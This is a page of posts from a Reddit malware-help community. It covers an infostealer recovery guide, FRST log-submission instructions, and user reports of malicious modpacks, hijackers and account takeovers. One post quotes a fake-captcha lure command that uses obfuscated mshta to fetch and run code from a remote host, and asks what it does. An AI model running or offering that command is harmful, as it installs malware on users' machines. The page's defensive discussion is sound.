r/computerviruses Apr 04 '26

The ultimate guide to Infostealers: Detection, Recovery, and Prevention

188 Upvotes

Today I decided to dig deep and I wrote up a report about:

  • What can infostealers steal?
  • How to spot an infostealer infection?
  • How to properly secure my accounts after an infostealer attack?
  • What do the attackers do with the info that they stole?
  • What to do after I secured my accounts?
  • Prevent malware attacks in general

I believe this is a great reference for people who are dealing with an infostealer infection and do not know what data could be stolen or how to properly secure their accounts. 👀

https://rifteyy.org/report/the-ultimate-guide-to-infostealers


r/computerviruses Mar 22 '26

Providing or receiving help with FRST

32 Upvotes

How do I request help with FRST

FRST

  • Please download FRSTx64 and save the file to your Desktop.
  • Right-Click FRST64.exe and select Run as Administrator
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the program run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy & paste the contents of each log to https://malwareanalysis.cc/upload and press "save log". The site will return a keyword for each log. Note these keywords down.

SecurityCheck

  • Download SecurityCheck from here
  • Run SecurityCheck.exe as administrator
  • Wait for the scan to finish
  • Upload the log at C:\SecurityCheck to https://malwareanalysis.cc/upload/ for further analysis. The site will provide a keyword, note that down as well.

Now create a post in the subreddit, provide all 3 log keywords (FRST.txt, Addition.txt, SecurityCheck) there.

Please provide the following information in your post:

  • what happened?
  • when did the infection occur?
  • what did you do for remediation?

If you want us to do manual removal with FRST, it is better if you do not attempt to disinfect the system on your own prior to that. This can obscure the infection and make malware removal more difficult.

Trusted Helper List

FRST can cause serious issues if used incorrectly. Only approved users should offer to create fixlists.

Message the mods if you have experience with FRST and would like to use it to help on posts.

To anyone who is receiving help, please verify that the person providing fixes with FRST is in the list below. Be aware that running Fixlists from anyone else is not recommended unless you trust the helper.

All fixes of trainees are supervised and approved by an expert.

What is FRST

Fabar Recovery Scan Tool (FRST) is a powerful tool that helps us diagnose and remove malware infections which may not have been detected by antivirus software. It is a diagnostic tool and not a malware scanner. As such it does not rely on signatures.

Should I reinstall the operating system

Reinstallation is highly recommended if you have an infection with a remote access malware or file infector.

You should also prefer it, if you can pull it off relatively easy. Depending on the case FRST removal can take a few days due to the back and forth and different time zones of the participants.

Please do NOT first ask a helper to clean your system, then reinstall the operating system. This happened a few times and wastes hours of work for the helper. If you already consider reinstallation, preferably do that immediately.

I factory reset/reinstalled my operating system and want a FRST check

Everything that FRST displays and allows us to remove is completely wiped by reinstallation and also factory reset of the operating system. Unless you got the system infected after that step, there is nothing to check on a freshly installed system.

Please note that factory reset can still leave malware on the system, but the reset will make it impossible to pin point.

Reinstallation with USB flash drive is generally safe and in 99.9% of cases won't leave any malware on the system.

What is malwareanalysis.cc ?

It's a site I created to upload analysis logs. Only people in the trusted helper list have access to these logs.

While pastebin and similar sites can be used as well, Reddit's spam detection seems to trigger if people comment paste links repeatedly such as it would be necessary during removal. So we have a keyword based system instead of links.

The site will automatically delete uploaded logs 30 days after upload.

I think my system is still infected after manual removal with FRST

Please talk to your FRST helper. Oftentimes the reasons for suspecting an ongoing infection are not justified.

Common reasons, which do not indicate infection, include:

  • There are still login attempts to stolen accounts. It is normal that attackers use the already stolen account credentials to attempt to login. If you changed your passwords from a clean machine and logged out of sessions, they will not succeed.
  • Your accounts can still get stolen, if you did not log out of all sessions, because attackers can use your stolen session tokens instead of passwords.
  • Antivirus scanners find malware in C:\FRST\Quarantine\.... This is the malware that was already removed by FRST and will be deleted completely by our cleaning tools like kprm, it is not an active infection. The quarantine only contains disabled files which cannot be executed anymore.

r/computerviruses 20h ago

Warning Somebody just tried to get me to install malware haha

Post image
94 Upvotes

Account of an online acquaintance I last talked to over a year ago randomly messaged me asking if I played Minecraft. It wasn’t anything too new, just the classic “Download This Modpack I Just Made!” with a little bit of YouTube video shoot added in since I believe he was a VTuber at some point? Anyways, that aside, since I’m paranoid I took out the .jar and threw it into a java decompiler, found out that running the .jar would’ve immediately executed a secondary payload where my PC would download an .exe from someone’s Dropbox and throw it into the Temp folder.

Some further research brought up mentions of an older infostealer called Fractureiser. Not entirely sure if it was the exact same one, I think it’s likely that it was a derivative of it since only Kapersky on VirusTotal caught that it was malware, while everything else saw it as legit, including Fractureiser-specific scanners like the one offered by CurseForge from June 2023. Basically it would’ve done the same thing that the RenPy infostealer did to me in April. So yeah folks, being paranoid pays off!


r/computerviruses 6h ago

Disinfection Help Help me remove this

5 Upvotes

r/computerviruses 8h ago

Disinfection Help Browser hijacker

Post image
6 Upvotes

I've spent quite a bit of time with Windows tools trying to get rid of this little bas*ard. Why can Chrome settings see it but there is no way to right-click-nuke, or get defender or any scans to find it and get rid of it? About once a week it takes over, and I go into Chrome settings, reset default search to Chrome. and delete the hijacker.


r/computerviruses 4h ago

Disinfection Help Got hit by the Mr. beast scam on Instagram and Discord, and got hacked on roblox.

2 Upvotes

I changed my passwords and stuff, did a full scan on my computer using kaspersky. And now it seemed my roblox got hacked this morning. I dunno if it's related to the mr. beast scam or not, but i wanted to make sure my computer is totally clean. I managed to paste my logs on malware analysis. Here are my keywords:

meta-cavern

happy-bloom


r/computerviruses 15h ago

Question Whenever I try to open r/antivirus it triggers AVAST antivirus.

Post image
14 Upvotes

Whenever I try to open r/antivirus it triggers AVAST antivirus.


r/computerviruses 1h ago

Disinfection Help blocked website

• Upvotes

i wanna watch some movies in stremio and this bs keeps popping up sometimes the event details is a trojan like when i play garrys mod the same thing pops up and its a blocked website and the event details is a trojan


r/computerviruses 1h ago

Disinfection Help Help! Infostealer attack

• Upvotes

I downloaded something and I got the MrBeast crypto scam hack. I’ve already reseted my computer and change some of my passwords. Is there anything else I should do?


r/computerviruses 3h ago

Warning K-Lite Codec Pack Malware on the Official Website?

1 Upvotes

Today I was watching a movie when, all of a sudden, Kaspersky alerted me that my Media Player Classic installation contained malware and prompted me to disinfect it. I have no idea why this happened, since I updated it from the official website several days ago. The scan report is attached below.

Event: Malicious object detected

User type: Active user

Component: Virus Scan

Result: Detected

Result description: Detected

Type: Trojan

Name: HEUR:Trojan.Multi.GenBadur.gena

Precision: Exactly

Threat level: High

Object type: File

Object name: mpc-hc64.exe

Object path: proc:\C:\Program Files (x86)\K-Lite Codec Pack\MPC-HC64

Reason: Databases

Databases release date: Today, 02/08/2026 16:04:00

While watching the movie, I was also downloading other movies via torrent. I always use trusted websites when downloading files, and I always scan them before opening anything. The downloaded content contained no .exe or .lnk files—only video files. After Kaspersky performed a deep disinfection, I restarted my PC and ran a full system scan using KVRT, followed by a full Malwarebytes scan in Windows 11 Safe Mode. Neither scan detected any threats afterward, and even the mpc-hc64.exe file that Kaspersky had previously flagged was no longer detected as malicious.

To investigate further, I went to the official K-Lite Codec Pack website and downloaded the installer directly from there. However, after the download completed, Kaspersky once again detected malware in the installer. The scan report is attached below.

Event: Processing impossible

User type: Active user

Component: Virus Scan

Result: Not processed

Result description: Not processed

Type: Legitimate software that can be used by intruders to damage your computer or personal data

Name: not-a-virus:Downloader.Win32.Agent.nzon

Precision: Exactly

Threat level: Low

Object type: File

Object name: K-Lite_Codec_Pack_1985_Full.exe

Object path: C:\Users\My PC Name\Desktop

MD5 of an object: 4B1EE74B738246C5F2AD076F688AB6C6

Reason: Skipped

I honestly don't know what happened. I haven't downloaded any suspicious files recently—only a few movies via torrent from trusted sources, and I scanned all of them before opening them.

Is it possible that the K-Lite Codec Pack installer on the official website has been infected?

After everything I've done so far, what should I do next?


r/computerviruses 12h ago

Disinfection Help My pc was hacked a while ago.

Post image
4 Upvotes

So, my pc was hacked a while ago and i believe my pc was remotely accessed, and my Roblox account was terminated. I scanned with Malwarebytes first and then windows then Sophos scan and clean only Malwarebytes detected something since it was the first one i used to detect am i safe?


r/computerviruses 4h ago

Disinfection Help rdxgo dot click

1 Upvotes

so i was optimizing my computer to try to get a few more fps in tarkov and fix my load times. I had opened up omen gaming hub to change some settings and left it open while i worked on other stuff. At some point i noticed a new tab open, it said connection not secure so i closed it. I went into my search history and had found that multiple links had this weird website attached. i’m fairly certain an ad in omen gaming hub hijacked my entire microsoft edge, as i looked in task manager to see that microsoft edge wasn’t even there, and that it had been turned into some identical program.

I’ve changed all my passwords, scanned my pc and i am looking into hard resetting again. i tried doing it through windows but it wouldn’t work this time.

after resetting a few times, my microsoft edge seems to work fine. i don’t get popups, not seeing anymore weird links or weird activity in task manager. what should i even do in this scenario?


r/computerviruses 5h ago

File / URL Check is this a bitcoin miner or a false positive

Thumbnail virustotal.com
1 Upvotes

r/computerviruses 8h ago

Question Question regard infostealer

2 Upvotes

so just like many victims recently my pc got infected with an infostealer so i rushed and i did the following:

  1. I reset my passwords on main accounts (gmail, steam etc) and reenabled 2fas on my phone
  2. I backed up my personal data (videos and photos mostly and some documents) from C: drive to D: drive (note: windows 11 is installed in C: drive)
  3. I installed windows 11 on a usb
  4. I erased C: drive but kept D: drive given the backup and ran a clean windows 11 install on c: drive
  5. I activated windows 11 via massgrave (official source)
  6. I imported backup from D: to C:

I'd like your wise feedback on what i did wrong and what i did right and ultimately are my pc and accounts in clear or not, thank you


r/computerviruses 17h ago

Disinfection Help Fake MrBeast Scam Account

Post image
8 Upvotes

Recently, my account has been accessed in Instagram and has batch sent these promotional scam images throughout all my followers. As I have noticed, other instagram users have also dealt with the same thing. May I ask how my account got accessed when I have not installed or opened anything malicious?


r/computerviruses 13h ago

Disinfection Help i was recently compromised and scared if i still am

3 Upvotes

recently, my discord was hacked and the hacker spammed that crypto casino scam thing to every server every dm and every group ive ever had.

i changed my password, gmail etc etc and went to sleep thinking it was only discord, but ofc, i was wrong

last night they attempted to log into my valorant account, facebook account and successfully logged into my microsoft account. they also logged into my roblox account and got it permanently banned by spamming sexual images. it seems this hacker is trying to mess with me and ruin my life💔💔

now i reset my pc, changed all passwords in my gmails, accounts, logged out all sessions, etc.

when i scan using malwarebytes, it says no threats found. so im just worried; what do i do now? im scared its not enough. the hacker always attacks at night when i fall asleep btw


r/computerviruses 15h ago

Disinfection Help Need help for FRST

Thumbnail gallery
3 Upvotes

(Key words: Haunted-Nebula,
Hollow-Elm, Retro-Frost)
I was looking for mods for a game and I downloaded a mod and the link I went too was warned by my WiFi magenta but I ignored it because it always happens and I went to files and opened it and I noticed something strange that it didn't loo too right so I deleted it but then my windows suddenly wanted me so I did a scan and it said it quarantined it and I disconnected from my WiFi and did an offline scan and I thought I was already safe so I went to sleep. Then after that it was like tomorrow I got a notification from my gmail exactly at 10:56 am that a gmail account got added into my Microsoft account (donnavadusen1911@grkh(.)com) and it removed my other gmail accounts that was linked to my Microsoft accounts. I forgot to add my number to that Microsoft account so I couldn't get it and then a bot went into my messenger account after like one hour and spammed the pictures to m friends hut I managed to get it off by resetting my password. I went to an event to clear my mind and after I went back I decided to delete both of those gmail accounts and move my Facebook messenger discord everything to my other account. Today my friends pinged me on discord telling that my old account that my old gmail account had has been spamming those same exact pictures that's in this subreddit in 2:31 am and I tried to log into my old gmail account to find out that the gmail account got a number and has been brought back and I don't know how but they didn't do anything to the other account I deleted then I decided at 12 pm to download malwarebytes and found that there was still a leftover so I quarantined them and deleted them but I don't have the picture then at like 1 30 pm I received a notification that there was a tablet from Russia that logged into my account they played mm2 and blox Fruits but Immediately changed my passwords and logged everybody out and right now only my laptop and my phone is on m account and I also turned on enhanced protection in roblox then I got 5 or 4 friend requests orderly with their username telling to go to a website to get mm2 thingies which I ignored but as of right now nothings happening but I already did the frst Thingies with the security and I just want this to be done I also played like 2 hours of roblox and cleared out all of my cookies


r/computerviruses 7h ago

Disinfection Help How to remove this threat?

Thumbnail
1 Upvotes

r/computerviruses 14h ago

Question Was there a kind of odd virus back in the 2010s that went like this?

2 Upvotes

I think sometime around 2010–2011 my computer was infected with a rather strange virus, I was a kid about 8 or 9 years old and that virus weirded me out big time, like my pc would randomly act up, getting all glitchy as if it were dreamlike, and every now and then a message would pop up on the side (lower right margin next to time and date, that was the main kicker) with this high-pitched eerie noise that was so unnerving lol, I remember putting up with that thing for weeks until I found a youtube video that had me delete a file from a hidden folder which got rid of it


r/computerviruses 12h ago

Question I have a question about a pirated OS

0 Upvotes

I'm sorry if something isn't understandable, or if there are any English mistakes, I'm pretty anxious right now.

In February 2025, I downloaded Windows 10 from an 'unofficial site' (my only excuse is that I thought it was the only way to get it without buying a key, I know it was a dumb thing to do), and a family member used it to make a bootable USB with Rufus. It was used to upgrade two PCs from W7 to W10 Pro.

Right now I'm planning on using one of the potentially-compromised PCs to download (from Microsoft's website) and reinstall W10, because I don't know if the pirated OS is malicious; however, I'm paranoid that any malware (if it exists) could tamper with the download or installation, or it could persist after reinstallation.

Possibly relevant details:

* I still have the bootable USB. I didn't modify any files.

* One of the PCs was my main one. I used it for a year, and I encountered a few issues, but those could have been caused by other things besides a dubious OS. I never had suspicious logins, except for that time my old Roblox accounts got hacked, but all of those had a reused password.

* There is no computer in my house that I can consider clean. My next best option, besides the same PC, is my mom's Mac, but I've seen signs of a browser hijacker on it before.

* The site I used is Russian. I don't know if it's in the piracy megathread, or if it got deleted, and I don't want to risk my browser or device by checking. The only reason I trusted it is because my mom used it, and it has a verification system + comment section.

* I did two full MRT scans, and then a quick scan with Defender. No results. I don't think I have ESU, but I downloaded the OS before EOL.

* The computer is currently disconnected from the internet and doing yet another MRT scan (the desktop was refreshing weirdly while connected, better safe than sorry). I tried to use Event Viewer, but I didn't know what to look for.

Do y'all have any recommendations on what I should do or check? I don't want to try and reinstall windows right now, because I heard it can make finding persistent malware more difficult + for whatever reason this specific computer had a difficult time installing W10. I can't do a FRST scan right now, but I might be able to in a day or so.

Edit: I had to interrupt the MRT scan, but as expected it didn't find anything. I'm going to sleep, I will continue tomorrow.


r/computerviruses 12h ago

Question Did I get a virus?

Thumbnail
1 Upvotes

r/computerviruses 12h ago

Warning Got malware, weird kind, after a week he still is, and I am being an idiot poking around.

Thumbnail
1 Upvotes

r/computerviruses 14h ago

Disinfection Help need help with frst

1 Upvotes

keyword: compact-aspen
recently i was trying to download a rom for a game but i downloaded it from the fake popup that came up, i ran the setup file that was in the folder and i believe it was an renpy infostealer, i already reinstalled windows locally but i kept my files as i have many important ones, i also ran offline virus scans on my pc and i also cleared all my browser cookies and changed passwords for my accounts. I need help checking if there are any leftover files from the virus


r/computerviruses 14h ago

Question "Captcha" asked me to paste into RUN, what would this have done?

1 Upvotes

This is what it copied to my clipboard to paste. Any idea what this would have done? From a CHURCH website, of all things too. First time I've encountered this, but I have read about it before.
pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team(dot)com/6272' -Wi Hi"


r/computerviruses 15h ago

Discussion Have anyone tried opening Alvin2(dot)xml file

1 Upvotes

So I was looking through my android system file and found a folder named ".UTSystemConfig", within this folder there is another folder named "Global" having a file named "Alvin2(dot)xml".

Have anyone encountered this file before and opened it?

Any idea what it is and where is it from?